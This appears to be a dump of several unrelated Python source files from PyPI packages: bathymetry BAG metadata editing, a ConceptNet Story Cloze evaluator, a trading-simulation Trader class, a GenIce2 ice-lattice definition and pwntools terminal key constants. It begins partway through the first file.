                self.meta_errors.append(err_msg)
        return is_valid

    def validation_info(self):
        """ Return a message string with the result of the validation """
        msg = str()
        msg += "XML input source: %s\nValidation output: " % self._bag_metadata
        if self.validate_metadata():
            msg += "VALID"
        else:
            msg += "INVALID\nReasons:\n"
            for err_msg in self.meta_errors:
                msg += " - %s\n" % err_msg
        return msg

    def populate_metadata(self):
        """ Populate metadata class """
        if self.meta is not None:
            # already populated: reuse the cached Meta instance
            return self.meta
        self.meta = Meta(meta_xml=self.metadata(as_pretty_xml=True))
        return self.meta

    def modify_wkt_prj(self, wkt_hor, wkt_ver=None):
        """ Modify the wkt prj in the metadata content

        wkt_hor
            The new horizontal wkt prj text to use
        wkt_ver
            The new vertical wkt prj text to use (optional)
        """
        ns = {
            'bag': 'http://www.opennavsurf.org/schema/bag',
            'gco': 'http://www.isotc211.org/2005/gco',
            'gmd': 'http://www.isotc211.org/2005/gmd',
            'gmi': 'http://www.isotc211.org/2005/gmi',
            'gml': 'http://www.opengis.net/gml/3.2',
            'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
        }
        # (leftover debug print of the raw metadata dataset removed)
        xml_tree = etree.fromstring(self[BAGFile._bag_metadata][:].tobytes())
        try:
            ret = xml_tree.xpath('//*/gmd:referenceSystemInfo/gmd:MD_ReferenceSystem/'
                                 'gmd:referenceSystemIdentifier/gmd:RS_Identifier/gmd:code/gco:CharacterString',
                                 namespaces=ns)
            ret[0].text = wkt_hor
            if wkt_ver is not None:
                ret[1].text = wkt_ver
        except etree.Error as e:
            logger.warning("unable to read the WKT projection string: %s" % e)
            return
        # write the modified XML back as a char-by-char dataset
        new_xml = etree.tostring(xml_tree, pretty_print=True)
        del self[BAGFile._bag_metadata]
        ds = self.create_dataset(BAGFile._bag_metadata, shape=(len(new_xml), ), dtype="S1")
        for i, x in enumerate(new_xml):
            ds[i] = bytes([x])

    def modify_bbox(self, west, east, south, north):
        """ attempts to modify the bounding box values """
        ns = {
            'bag': 'http://www.opennavsurf.org/schema/bag',
            'gco': 'http://www.isotc211.org/2005/gco',
            'gmd': 'http://www.isotc211.org/2005/gmd',
            'gmi': 'http://www.isotc211.org/2005/gmi',
            'gml': 'http://www.opengis.net/gml/3.2',
            'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
        }
        xml_tree = etree.fromstring(self[BAGFile._bag_metadata][:].tobytes())
        try:
            ret_x_min = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:westBoundLongitude/gco:Decimal',
                                       namespaces=ns)
            ret_x_max = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:eastBoundLongitude/gco:Decimal',
                                       namespaces=ns)
        except etree.Error as e:
            logger.warning("unable to read the bbox's longitude values: %s" % e)
            return
        try:
            ret_x_min[0].text = "%s" % west
            ret_x_max[0].text = "%s" % east
        except (ValueError, IndexError) as e:
            logger.warning("unable to read the bbox's longitude values: %s" % e)
            return
        try:
            ret_y_min = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:southBoundLatitude/gco:Decimal',
                                       namespaces=ns)
            ret_y_max = xml_tree.xpath('//*/gmd:EX_GeographicBoundingBox/gmd:northBoundLatitude/gco:Decimal',
                                       namespaces=ns)
        except etree.Error as e:
            logger.warning("unable to read the bbox's latitude values: %s" % e)
            return
        try:
            ret_y_min[0].text = "%s" % south
            ret_y_max[0].text = "%s" % north
        except (ValueError, IndexError) as e:
            logger.warning("unable to read the bbox's latitude values: %s" % e)
            return
        # write the modified XML back as a char-by-char dataset
        new_xml = etree.tostring(xml_tree, pretty_print=True)
        del self[BAGFile._bag_metadata]
        ds = self.create_dataset(BAGFile._bag_metadata, shape=(len(new_xml),), dtype="S1")
        for i, x in enumerate(new_xml):
            ds[i] = bytes([x])

    def _str_group_info(self, grp):
        """ Visitor callback: append a one-line summary of *grp* to self._str. """
        if grp == self._bag_root:
            self._str += "  <root>\n"
        elif grp == self._bag_elevation:
            self._str += "  <elevation shape=%s>\n" % str(self.elevation().shape)
        elif grp == self._bag_uncertainty:
            self._str += "  <uncertainty shape=%s>\n" % str(self.uncertainty().shape)
        elif grp == self._bag_tracking_list:
            self._str += "  <tracking list shape=%s>\n" % str(self.tracking_list().shape)
        elif grp == self._bag_metadata:
            if self.meta is not None:
                self._str += "  %s\n" % str(self.meta)
            else:
                self._str += "  <%s>\n" % grp
        else:
            self._str += "  <%s>\n" % grp
        if grp != self._bag_metadata:
            for atr in self[grp].attrs:
                atr_val = self[grp].attrs[atr]
                # NOTE(review): assumes every attribute value is a numpy
                # scalar/array exposing .shape and .dtype — TODO confirm
                self._str += "    <%s: %s (%s, %s)>\n" % (atr, atr_val, atr_val.shape, atr_val.dtype)

    def __str__(self):
        self._str = super(BAGFile, self).__str__()
        self.visit(self._str_group_info)
        return self._str
|
PypiClean
|
/ConceptNet-5.7.0.tar.gz/ConceptNet-5.7.0/conceptnet5/vectors/evaluation/story.py
|
import pandas as pd
from statsmodels.stats.proportion import proportion_confint
from conceptnet5.util import get_support_data_filename
from conceptnet5.vectors import cosine_similarity
from conceptnet5.vectors.query import VectorSpaceWrapper
def read_cloze(filename):
    """ Parse a story-cloze TSV file.

    The file has a header line, then one record per line with the fields:
    uuid, four story sentences, two candidate endings and the number (1 or 2)
    of the correct ending.

    Yields:
        ((sent1, sent2, sent3, sent4), (right_answer, wrong_answer)) per record.

    Raises:
        ValueError: if the answer-number field is neither '1' nor '2'.
    """
    with open(filename, encoding='utf-8') as fh:
        fh.readline()  # throw away header
        for raw in fh:
            raw = raw.rstrip()
            if not raw:
                continue
            _uuid, s1, s2, s3, s4, ans_a, ans_b, ans_num = raw.split('\t')
            if ans_num == '1':
                yield (s1, s2, s3, s4), (ans_a, ans_b)
            elif ans_num == '2':
                yield (s1, s2, s3, s4), (ans_b, ans_a)
            else:
                raise ValueError("Unrecognized answer number: %r" % ans_num)
def evaluate(frame, subset='val'):
    """
    Evaluate a DataFrame of term vectors on the Story Cloze task: for each
    four-sentence story, check whether the right ending is more similar to the
    story than the wrong one. Uses a VectorSpaceWrapper to fill missing
    vocabulary from ConceptNet.

    Return a Series with the accuracy and its confidence interval, labeled
    'acc', 'low' and 'high'.
    """
    # Make subset names consistent with other datasets; the final evaluation
    # ('all') uses just the test data.
    subset = {'dev': 'val', 'all': 'test'}.get(subset, subset)
    filename = get_support_data_filename(
        'story-cloze/cloze_test_spring2016_%s.tsv' % subset
    )
    vectors = VectorSpaceWrapper(frame=frame)
    total = 0
    correct = 0
    for sentences, (right_answer, wrong_answer) in read_cloze(filename):
        probe_vec = vectors.text_to_vector('en', ' '.join(sentences))
        sim_right = cosine_similarity(probe_vec, vectors.text_to_vector('en', right_answer))
        sim_wrong = cosine_similarity(probe_vec, vectors.text_to_vector('en', wrong_answer))
        if sim_right > sim_wrong:
            correct += 1
        total += 1
    low, high = proportion_confint(correct, total)
    return pd.Series([correct / total, low, high], index=['acc', 'low', 'high'])
|
PypiClean
|
/sdmaster-1.0.8.tar.gz/sdmaster-1.0.8/sdm/simulation/trader.py
|
import logging
from sdm.util.date_utils import date_to_string
import matplotlib.pyplot as plt
import numpy as np
DEFAULT_COMMISSION_FLAT_FEE = 0
REALTIME_PRICE_KEY = "price"
def default_commission(transaction):
    """ Flat-fee commission model.

    Charges DEFAULT_COMMISSION_FLAT_FEE per transaction, but waives the fee
    for a sell (negative action) whose notional value is below the flat fee.
    """
    is_sell = transaction.action < 0
    notional = transaction.price * transaction.amount
    if is_sell and notional < DEFAULT_COMMISSION_FLAT_FEE:
        return 0
    return DEFAULT_COMMISSION_FLAT_FEE
class Trader:
    """A single simulated market participant.

    A Trader holds cash and per-symbol stock positions. On each trading day it
    asks its strategy function for transactions, validates them against the
    current price (real-time if supplied, otherwise the day's close), and
    applies the valid ones to its cash and position, recording them in its
    transaction history.
    """

    def __init__(self, strategy_function, init_fund, start_date, end_date, commission_calc_func=default_commission,
                 name="Default Trader"):
        """
        The trader is an individual trader that performs its own tradings in the market object.

        :param strategy_function: a function to decide whether to make a trade, on which symbol, to buy or sell for
            what volume. This should be a generator function that yields Transaction objects representing the
            transactions to be made, based on the current day's market data (or real time price if available), the
            cumulative market data up to today, current position, total cash, and its trading history.
        :param init_fund: the total cash this trader initially has
        :param start_date: a datetime object for the start date of trading
        :param end_date: a datetime object for the end date of trading
        :param commission_calc_func: A function that takes a transaction and returns the commission fee.
            Defaults to ``default_commission``.
        :param name: a human-readable name used in logs and plot legends
        :raises ValueError: if *strategy_function* is not callable
        """
        if not callable(strategy_function):
            raise ValueError("Variable strategy_function must be a function, but passed in as {} instead".format(
                type(strategy_function)))
        self._func = strategy_function
        self._start_date = start_date
        self._end_date = end_date
        self._current_day = start_date
        self._init_fund = init_fund
        self.cash = init_fund
        self._name = name
        self._position = {}  # symbol -> number of shares currently held
        self._latest_close_price = {}  # symbol -> most recently seen close price
        self.commission_calc_func = commission_calc_func
        self._transaction_history = []

    def reset(self):
        """Restore the trader to its initial state (cash, position, history)."""
        self._current_day = self._start_date
        self.cash = self._init_fund
        self._position = {}
        self._latest_close_price = {}
        self._transaction_history = []

    def set_func(self, func):
        self._func = func

    @property
    def cash(self):
        return self._cash

    @cash.setter
    def cash(self, cash):
        # Reject negative balances; zero is allowed.
        if cash < 0:
            raise ValueError("Cash must be a positive number but given {}".format(cash))
        self._cash = cash

    def is_valid_transaction(self, transaction, current_price):
        """Return True when *transaction* can be executed at *current_price*.

        Rejects (and logs) buys priced below the market, sells priced above
        it, buys the trader cannot afford including commission, and sells of
        more shares than currently held.
        """
        if transaction.action > 0 and transaction.price < current_price:
            logging.error("Error: you try to buy {} at price {} but the market lowest price is {}. Skipping.".format(
                transaction.symbol, transaction.price, current_price))
            return False
        if transaction.action < 0 and transaction.price > current_price:
            logging.error("Error: you try to sell {} at price {} but the market highest price is {}. Skipping.".format(
                transaction.symbol, transaction.price, current_price))
            return False
        if transaction.action > 0 and self.cash < transaction.amount * transaction.price + self.commission_calc_func(
                transaction):
            logging.error("Error: you only have cash of {}, which is not enough to buy {} stocks of {} at price {} "
                          "with commission {}".format(self.cash, transaction.amount, transaction.symbol,
                                                      transaction.price, self.commission_calc_func(transaction)))
            return False
        if transaction.action < 0:
            # Use .get() so selling a symbol that was never bought is reported
            # as an invalid transaction instead of raising a KeyError.
            held = self._position.get(transaction.symbol, 0)
            if held < transaction.amount:
                logging.error("Error: you only have {} stock of {}, which is not enough to sell for {}".format(
                    held, transaction.symbol, transaction.amount))
                return False
        return True

    def make_trades(self, market_data_cumulative, current_day, real_time_price=None, force=False):
        """Ask the strategy for transactions on *current_day* and apply the valid ones.

        :param market_data_cumulative: market data up to and including *current_day*
        :param current_day: the day being traded; must not precede the trader's current day
        :param real_time_price: optional mapping symbol -> {REALTIME_PRICE_KEY: price};
            when given it takes precedence over simulated close prices
        :param force: when True, skip validity checks and apply every transaction
        :return: the list of transactions that were actually executed
        :raises ValueError: if *current_day* is earlier than the trader's current day
        """
        if current_day < self._current_day:
            raise ValueError("CAN NOT go backwards: Current day for the trader is {} but the date to make trade is {}"
                             .format(date_to_string(self._current_day), date_to_string(current_day)))
        self._current_day = current_day
        transactions = self._func(market_data_cumulative=market_data_cumulative, current_day=current_day,
                                  position=self._position, cash=self.cash,
                                  transaction_history=self._transaction_history,
                                  real_time_price=real_time_price)
        valid_transactions = []
        for transaction in transactions:
            if real_time_price is not None:
                # If we are checking against real market data
                if transaction.symbol in real_time_price:
                    current_price = real_time_price[transaction.symbol][REALTIME_PRICE_KEY]
                else:
                    logging.error("Trying to make a transaction on symbol {} on {} but cannot find it in realtime "
                                  "price data. Skipping this transaction".format(transaction.symbol, current_day))
                    continue
            else:
                # If we are only simulating a trade, then use the previous close price as realtime price
                if transaction.symbol in market_data_cumulative[current_day]:
                    current_price = market_data_cumulative[current_day][transaction.symbol]["close"]
                    self._latest_close_price[transaction.symbol] = current_price
                elif transaction.symbol in self._latest_close_price:
                    # In case we have gap in data, we will use the previous closing price for buy/sell
                    current_price = self._latest_close_price[transaction.symbol]
                else:
                    logging.error("Trying to make a transaction on symbol {} on {} without any price data. Skipping "
                                  "this transaction".format(transaction.symbol, current_day))
                    continue
            if force or self.is_valid_transaction(transaction, current_price):
                logging.debug("{}ing amount {} on {} with price {}. Cash: {}".format(
                    transaction.get_action_name(), transaction.amount, transaction.symbol, transaction.price,
                    self._cash))
                # action is +1 for buys and -1 for sells, so this single line
                # deducts cost on a buy and credits proceeds on a sell, while
                # the inner action factor makes the commission a deduction in
                # both directions (action * action == 1).
                self.cash -= transaction.action * (transaction.amount * transaction.price + transaction.action *
                                                   self.commission_calc_func(transaction))
                if transaction.symbol not in self._position:
                    self._position[transaction.symbol] = transaction.action * transaction.amount
                else:
                    self._position[transaction.symbol] += transaction.action * transaction.amount
                self._transaction_history.append(transaction)
                valid_transactions.append(transaction)
            else:
                logging.error("Invalid transaction with reason shown above. Skipping this transaction.")
        return valid_transactions

    def log_assets(self):
        """Log the trader's current total value at INFO level."""
        logging.info("Total value of the trader {}: {} on day {}".format(self._name, self.get_total_value(),
                                                                         date_to_string(self._current_day)))

    def get_trading_history(self):
        return self._transaction_history

    def set_trading_history(self, trading_history):
        self._transaction_history = trading_history

    def get_start_date(self):
        return self._start_date

    def get_end_date(self):
        return self._end_date

    def get_name(self):
        return self._name

    def get_init_fund(self):
        return self._init_fund

    def get_position(self):
        return self._position

    def get_total_value(self):
        """Return cash plus the market value of all held positions.

        A position with no known latest close price is valued at the price of
        the most recent buy transaction for that symbol.
        """
        total_value = self.cash
        for (symbol, holds) in self._position.items():
            if symbol in self._latest_close_price:
                total_value += self._latest_close_price[symbol] * holds
            else:
                # If there is not a latest price, use the last bought price
                for transaction in reversed(self._transaction_history):
                    if symbol == transaction.symbol and transaction.is_buy():
                        total_value += transaction.price * holds
                        break
        return total_value

    def plot_performance(self):
        """Plot a histogram of per-round-trip profits and log summary statistics.

        NOTE(review): the bookkeeping asserts that every sell closes the full
        volume accumulated by earlier buys of the same symbol — partial sells
        will trip the assertion. Confirm with the strategy contract.
        """
        value_history = {}  # symbol -> (shares accumulated, total cost of those shares)
        transaction_list = []  # realized profit/loss per completed round trip
        for transaction in self._transaction_history:
            if transaction.action > 0:
                if transaction.symbol not in value_history:
                    value_history[transaction.symbol] = (transaction.amount, transaction.amount * transaction.price)
                else:
                    (last_vol, last_value) = value_history[transaction.symbol]
                    value_history[transaction.symbol] = (transaction.amount + last_vol,
                                                         last_value + transaction.amount * transaction.price)
            else:
                (last_vol, last_value) = value_history[transaction.symbol]
                assert (transaction.amount == last_vol)
                transaction_list.append(transaction.amount * transaction.price - last_value)
                value_history[transaction.symbol] = (0, 0)
        plt.hist(np.array(transaction_list), bins=100, range=(-1000, 1000), label=self._name)
        logging.info("Trader {}: {} profitable transactions, {} non-profitable transactions".format(
            self._name, sum(x > 0 for x in transaction_list), sum(x < 0 for x in transaction_list)))
        logging.info("Trader {}: Profit from transactions is {}, Loss from transactions is {}: ".format(
            self._name, sum(x for x in transaction_list if x > 0), sum(x for x in transaction_list if x < 0)))
        logging.info("Trader {}: The mean of the transactions is {} and the standard deviation is {}".format(
            self._name, np.mean(transaction_list), np.std(transaction_list)))
        logging.info("Trader {}: Between -500 and 500 the mean is {} and the standard deviation is {}".format(
            self._name, np.mean(list(x for x in transaction_list if abs(x) < 500)),
            np.std(list(x for x in transaction_list if abs(x) < 500))))
        plt.legend(loc='upper right')
        plt.show()
|
PypiClean
|
/GenIce2-2.1.7.1.tar.gz/GenIce2-2.1.7.1/genice2/lattices/2_2_623457.py
|
from genice2.cell import cellvectors
import genice2.lattices
import numpy as np
# Metadata consumed by the GenIce2 plugin loader: literature reference,
# option usage text, and a one-line description of this lattice.
desc = {
    "ref": {
        "2_2_623457": "Engel 2018"
    },
    "usage": "No options available.",
    "brief": "Hypothetical zeolitic ice"
}
class Lattice(genice2.lattices.Lattice):
    """Hypothetical zeolitic ice structure 2_2_623457 (Engel 2018).

    Defines an orthorhombic unit cell and the fractional coordinates of the
    96 water molecules it contains.
    """

    def __init__(self):
        # Orthorhombic unit cell: all angles 90 degrees. Lengths are in the
        # units expected by cellvectors (presumably Angstrom — TODO confirm
        # against genice2.cell documentation).
        self.cell = cellvectors(
            a=25.83251,
            b=29.04093,
            c=27.40942,
            A=90.0,
            B=90.0,
            C=90.0
        )
        # Water oxygen positions as fractional (relative) coordinates of the
        # cell above; some values fall outside [0, 1) and wrap periodically.
        self.waters = np.array([
            [0.166953, 0.083210, 0.011201],
            [0.163821, 0.418768, 0.263662],
            [0.000289, 0.333207, 0.011200],
            [-0.002839, 0.168759, 0.263656],
            [-0.003007, 0.336496, 0.324382],
            [0.001657, 0.164088, 0.074798],
            [0.163672, 0.086511, 0.324369],
            [0.168306, 0.414109, 0.074784],
            [0.500284, 0.083210, 0.011201],
            [0.497153, 0.418768, 0.263662],
            [0.333622, 0.333207, 0.011200],
            [0.330494, 0.168760, 0.263655],
            [0.330327, 0.336496, 0.324382],
            [0.334990, 0.164088, 0.074798],
            [0.497006, 0.086512, 0.324368],
            [0.501639, 0.414109, 0.074783],
            [-0.166381, 0.083210, 0.011201],
            [-0.169513, 0.418768, 0.263662],
            [0.666954, 0.333207, 0.011200],
            [0.663826, 0.168759, 0.263655],
            [0.663660, 0.336496, 0.324382],
            [0.668325, 0.164088, 0.074799],
            [-0.169661, 0.086511, 0.324368],
            [-0.165028, 0.414109, 0.074784],
            [0.166953, 0.583211, 0.011201],
            [0.163821, -0.081232, 0.263662],
            [0.000289, -0.166793, 0.011200],
            [-0.002839, 0.668760, 0.263655],
            [-0.003006, -0.163503, 0.324382],
            [0.001657, 0.664087, 0.074798],
            [0.163672, 0.586510, 0.324368],
            [0.168306, -0.085893, 0.074783],
            [0.500284, 0.583211, 0.011201],
            [0.497153, -0.081232, 0.263662],
            [0.333622, -0.166793, 0.011200],
            [0.330494, 0.668760, 0.263656],
            [0.330327, -0.163504, 0.324382],
            [0.334990, 0.664087, 0.074798],
            [0.497006, 0.586510, 0.324368],
            [0.501639, -0.085893, 0.074783],
            [-0.166381, 0.583211, 0.011201],
            [-0.169513, -0.081232, 0.263662],
            [0.666954, -0.166793, 0.011200],
            [0.663826, 0.668760, 0.263655],
            [0.663660, -0.163503, 0.324382],
            [0.668325, 0.664087, 0.074799],
            [-0.169661, 0.586510, 0.324368],
            [-0.165028, -0.085893, 0.074784],
            [0.161138, 0.083694, 0.511426],
            [0.172129, 0.416268, -0.239019],
            [-0.005527, 0.333700, 0.511441],
            [0.005476, 0.166273, -0.239024],
            [0.005465, 0.333667, -0.177656],
            [-0.005502, 0.166391, 0.572270],
            [0.172145, 0.083677, -0.177647],
            [0.161136, 0.416402, 0.572267],
            [0.494470, 0.083693, 0.511426],
            [0.505464, 0.416268, -0.239019],
            [0.327807, 0.333700, 0.511441],
            [0.338810, 0.166274, -0.239024],
            [0.338798, 0.333667, -0.177656],
            [0.327831, 0.166392, 0.572270],
            [0.505479, 0.083677, -0.177647],
            [0.494470, 0.416402, 0.572267],
            [-0.172195, 0.083693, 0.511426],
            [-0.161205, 0.416268, -0.239019],
            [0.661140, 0.333700, 0.511441],
            [0.672141, 0.166273, -0.239024],
            [0.672130, 0.333667, -0.177656],
            [0.661163, 0.166390, 0.572270],
            [-0.161189, 0.083677, -0.177647],
            [-0.172197, 0.416402, 0.572267],
            [0.161137, 0.583693, 0.511426],
            [0.172128, -0.083732, -0.239019],
            [-0.005527, -0.166300, 0.511441],
            [0.005477, 0.666273, -0.239024],
            [0.005465, -0.166333, -0.177656],
            [-0.005502, 0.666391, 0.572270],
            [0.172145, 0.583676, -0.177647],
            [0.161136, -0.083599, 0.572267],
            [0.494470, 0.583693, 0.511426],
            [0.505464, -0.083731, -0.239019],
            [0.327807, -0.166300, 0.511441],
            [0.338810, 0.666273, -0.239024],
            [0.338798, -0.166333, -0.177656],
            [0.327831, 0.666391, 0.572270],
            [0.505479, 0.583676, -0.177647],
            [0.494470, -0.083599, 0.572267],
            [-0.172196, 0.583693, 0.511426],
            [-0.161204, -0.083731, -0.239019],
            [0.661140, -0.166300, 0.511441],
            [0.672141, 0.666273, -0.239024],
            [0.672130, -0.166333, -0.177656],
            [0.661163, 0.666391, 0.572270],
            [-0.161189, 0.583676, -0.177647],
            [-0.172197, -0.083599, 0.572267],
        ])
        # Tell GenIce that self.waters holds fractional cell coordinates.
        self.coord = 'relative'
|
PypiClean
|
/angr-pwntools-4.5.0.tar.gz/angr-pwntools-4.5.0/pwnlib/term/keyconsts.py
|
# Categories for parsed key events.
TYPE_UNICODE = 1
TYPE_KEYSYM = 2
TYPE_FUNCTION = 3
TYPE_POSITION = 4
TYPE_EOF = 5
TYPE_UNKNOWN = 6
TYPE_UNKNOWN_CSI = 7
# Modifier bit flags, combinable with |.
# Must be these exact values for CSI parsing to work
MOD_NONE = 0
MOD_SHIFT = 1 << 0
MOD_ALT = 1 << 1
MOD_CTRL = 1 << 2
# Key symbol constants; values are arbitrary but must stay unique, since
# KEY_NAMES below maps them to their display names.
# Special names in C0
KEY_BACKSPACE = 1
KEY_TAB = 2
KEY_ENTER = 3
KEY_ESCAPE = 4
# Special names in G0
KEY_SPACE = 5
KEY_DEL = 6
# Special keys
KEY_UP = 7
KEY_DOWN = 8
KEY_LEFT = 9
KEY_RIGHT = 10
KEY_BEGIN = 11
KEY_FIND = 12
KEY_INSERT = 13
KEY_DELETE = 14
KEY_SELECT = 15
KEY_PAGEUP = 16
KEY_PAGEDOWN = 17
KEY_HOME = 18
KEY_END = 19
# Special keys from terminfo
KEY_CANCEL = 20
KEY_CLEAR = 21
KEY_CLOSE = 22
KEY_COMMAND = 23
KEY_COPY = 24
KEY_EXIT = 25
KEY_HELP = 26
KEY_MARK = 27
KEY_MESSAGE = 28
KEY_MOVE = 29
KEY_OPEN = 30
KEY_OPTIONS = 31
KEY_PRINT = 32
KEY_REDO = 33
KEY_REFERENCE = 34
KEY_REFRESH = 35
KEY_REPLACE = 36
KEY_RESTART = 37
KEY_RESUME = 38
KEY_SAVE = 39
KEY_SUSPEND = 40
KEY_UNDO = 41
# Numeric keypad special keys
KEY_KP0 = 42
KEY_KP1 = 43
KEY_KP2 = 44
KEY_KP3 = 45
KEY_KP4 = 46
KEY_KP5 = 47
KEY_KP6 = 48
KEY_KP7 = 49
KEY_KP8 = 50
KEY_KP9 = 51
KEY_KPENTER = 52
KEY_KPPLUS = 53
KEY_KPMINUS = 54
KEY_KPMULT = 55
KEY_KPDIV = 56
KEY_KPCOMMA = 57
KEY_KPPERIOD = 58
KEY_KPEQUALS = 59
# Name mapping
# Maps key constants to their human-readable '<name>' form.
KEY_NAMES = {
    KEY_BACKSPACE : '<backspace>',
    KEY_TAB : '<tab>',
    KEY_ENTER : '<enter>',
    KEY_ESCAPE : '<escape>',
    KEY_SPACE : '<space>',
    KEY_DEL : '<del>',
    KEY_UP : '<up>',
    KEY_DOWN : '<down>',
    KEY_LEFT : '<left>',
    KEY_RIGHT : '<right>',
    KEY_BEGIN : '<begin>',
    KEY_FIND : '<find>',
    KEY_INSERT : '<insert>',
    KEY_DELETE : '<delete>',
    KEY_SELECT : '<select>',
    KEY_PAGEUP : '<page up>',
    KEY_PAGEDOWN : '<page down>',
    KEY_HOME : '<home>',
    KEY_END : '<end>',
    KEY_CANCEL : '<cancel>',
    KEY_CLEAR : '<clear>',
    KEY_CLOSE : '<close>',
    KEY_COMMAND : '<command>',
    KEY_COPY : '<copy>',
    KEY_EXIT : '<exit>',
    KEY_HELP : '<help>',
    KEY_MARK : '<mark>',
    KEY_MESSAGE : '<message>',
    KEY_MOVE : '<move>',
    KEY_OPEN : '<open>',
    KEY_OPTIONS : '<options>',
    KEY_PRINT : '<print>',
    KEY_REDO : '<redo>',
    KEY_REFERENCE : '<reference>',
    KEY_REFRESH : '<refresh>',
    KEY_REPLACE : '<replace>',
    KEY_RESTART : '<restart>',
    KEY_RESUME : '<resume>',
    KEY_SAVE : '<save>',
    KEY_SUSPEND : '<suspend>',
    KEY_UNDO : '<undo>',
    KEY_KP0 : '<kp0>',
    KEY_KP1 : '<kp1>',
    KEY_KP2 : '<kp2>',
    KEY_KP3 : '<kp3>',
    KEY_KP4 : '<kp4>',
    KEY_KP5 : '<kp5>',
    KEY_KP6 : '<kp6>',
    KEY_KP7 : '<kp7>',
    KEY_KP8 : '<kp8>',
    KEY_KP9 : '<kp9>',
    KEY_KPENTER : '<kp enter>',
    KEY_KPPLUS : '<kp plus>',
    KEY_KPMINUS : '<kp minus>',
    KEY_KPMULT : '<kp mult>',
    KEY_KPDIV : '<kp div>',
    KEY_KPCOMMA : '<kp comma>',
    KEY_KPPERIOD : '<kp period>',
    KEY_KPEQUALS : '<kp equals>',
}
# Reverse lookup: '<name>' string back to its key constant.
KEY_NAMES_REVERSE = {v:k for k, v in KEY_NAMES.items()}
# terminfo
# Short terminfo capability names for key sequences (parallel to STRFNAMES).
STRNAMES = [
    'ka1',
    'ka3',
    'kb2',
    'kbs',
    'kbeg',
    'kcbt',
    'kc1',
    'kc3',
    'kcan',
    'ktbc',
    'kclr',
    'kclo',
    'kcmd',
    'kcpy',
    'kcrt',
    'kctab',
    'kdch1',
    'kdl1',
    'kcud1',
    'krmir',
    'kend',
    'kent',
    'kel',
    'ked',
    'kext',
    'kf0',
    'kf1',
    'kf10',
    'kf11',
    'kf12',
    'kf13',
    'kf14',
    'kf15',
    'kf16',
    'kf17',
    'kf18',
    'kf19',
    'kf2',
    'kf20',
    'kf21',
    'kf22',
    'kf23',
    'kf24',
    'kf25',
    'kf26',
    'kf27',
    'kf28',
    'kf29',
    'kf3',
    'kf30',
    'kf31',
    'kf32',
    'kf33',
    'kf34',
    'kf35',
    'kf36',
    'kf37',
    'kf38',
    'kf39',
    'kf4',
    'kf40',
    'kf41',
    'kf42',
    'kf43',
    'kf44',
    'kf45',
    'kf46',
    'kf47',
    'kf48',
    'kf49',
    'kf5',
    'kf50',
    'kf51',
    'kf52',
    'kf53',
    'kf54',
    'kf55',
    'kf56',
    'kf57',
    'kf58',
    'kf59',
    'kf6',
    'kf60',
    'kf61',
    'kf62',
    'kf63',
    'kf7',
    'kf8',
    'kf9',
    'kfnd',
    'khlp',
    'khome',
    'kich1',
    'kil1',
    'kcub1',
    'kll',
    'kmrk',
    'kmsg',
    'kmov',
    'knxt',
    'knp',
    'kopn',
    'kopt',
    'kpp',
    'kprv',
    'kprt',
    'krdo',
    'kref',
    'krfr',
    'krpl',
    'krst',
    'kres',
    'kcuf1',
    'ksav',
    'kBEG',
    'kCAN',
    'kCMD',
    'kCPY',
    'kCRT',
    'kDC',
    'kDL',
    'kslt',
    'kEND',
    'kEOL',
    'kEXT',
    'kind',
    'kFND',
    'kHLP',
    'kHOM',
    'kIC',
    'kLFT',
    'kMSG',
    'kMOV',
    'kNXT',
    'kOPT',
    'kPRV',
    'kPRT',
    'kri',
    'kRDO',
    'kRPL',
    'kRIT',
    'kRES',
    'kSAV',
    'kSPD',
    'khts',
    'kUND',
    'kspd',
    'kund',
    'kcuu1',
]
# Long ("full") terminfo capability names, in the same order as STRNAMES
# so the two lists can be zipped together.
STRFNAMES = [
    'a1',
    'a3',
    'b2',
    'backspace',
    'beg',
    'btab',
    'c1',
    'c3',
    'cancel',
    'catab',
    'clear',
    'close',
    'command',
    'copy',
    'create',
    'ctab',
    'dc',
    'dl',
    'down',
    'eic',
    'end',
    'enter',
    'eol',
    'eos',
    'exit',
    'f0',
    'f1',
    'f10',
    'f11',
    'f12',
    'f13',
    'f14',
    'f15',
    'f16',
    'f17',
    'f18',
    'f19',
    'f2',
    'f20',
    'f21',
    'f22',
    'f23',
    'f24',
    'f25',
    'f26',
    'f27',
    'f28',
    'f29',
    'f3',
    'f30',
    'f31',
    'f32',
    'f33',
    'f34',
    'f35',
    'f36',
    'f37',
    'f38',
    'f39',
    'f4',
    'f40',
    'f41',
    'f42',
    'f43',
    'f44',
    'f45',
    'f46',
    'f47',
    'f48',
    'f49',
    'f5',
    'f50',
    'f51',
    'f52',
    'f53',
    'f54',
    'f55',
    'f56',
    'f57',
    'f58',
    'f59',
    'f6',
    'f60',
    'f61',
    'f62',
    'f63',
    'f7',
    'f8',
    'f9',
    'find',
    'help',
    'home',
    'ic',
    'il',
    'left',
    'll',
    'mark',
    'message',
    'move',
    'next',
    'npage',
    'open',
    'options',
    'ppage',
    'previous',
    'print',
    'redo',
    'reference',
    'refresh',
    'replace',
    'restart',
    'resume',
    'right',
    'save',
    'sbeg',
    'scancel',
    'scommand',
    'scopy',
    'screate',
    'sdc',
    'sdl',
    'select',
    'send',
    'seol',
    'sexit',
    'sf',
    'sfind',
    'shelp',
    'shome',
    'sic',
    'sleft',
    'smessage',
    'smove',
    'snext',
    'soptions',
    'sprevious',
    'sprint',
    'sr',
    'sredo',
    'sreplace',
    'sright',
    'srsume',
    'ssave',
    'ssuspend',
    'stab',
    'sundo',
    'suspend',
    'undo',
    'up',
]
# Maps a terminfo function-key name to its (key constant, modifier) pair.
FUNCSYMS = {
    'backspace' : (KEY_DEL, MOD_NONE ),
    'begin' : (KEY_BEGIN, MOD_NONE ),
    'beg' : (KEY_BEGIN, MOD_NONE ),
    'btab' : (KEY_TAB, MOD_SHIFT),
    'cancel' : (KEY_CANCEL, MOD_NONE ),
    'clear' : (KEY_CLEAR, MOD_NONE ),
    'close' : (KEY_CLOSE, MOD_NONE ),
    'command' : (KEY_COMMAND, MOD_NONE ),
    'copy' : (KEY_COPY, MOD_NONE ),
    'dc' : (KEY_DELETE, MOD_NONE ),
    'down' : (KEY_DOWN, MOD_NONE ),
    'end' : (KEY_END, MOD_NONE ),
    'enter' : (KEY_ENTER, MOD_NONE ),
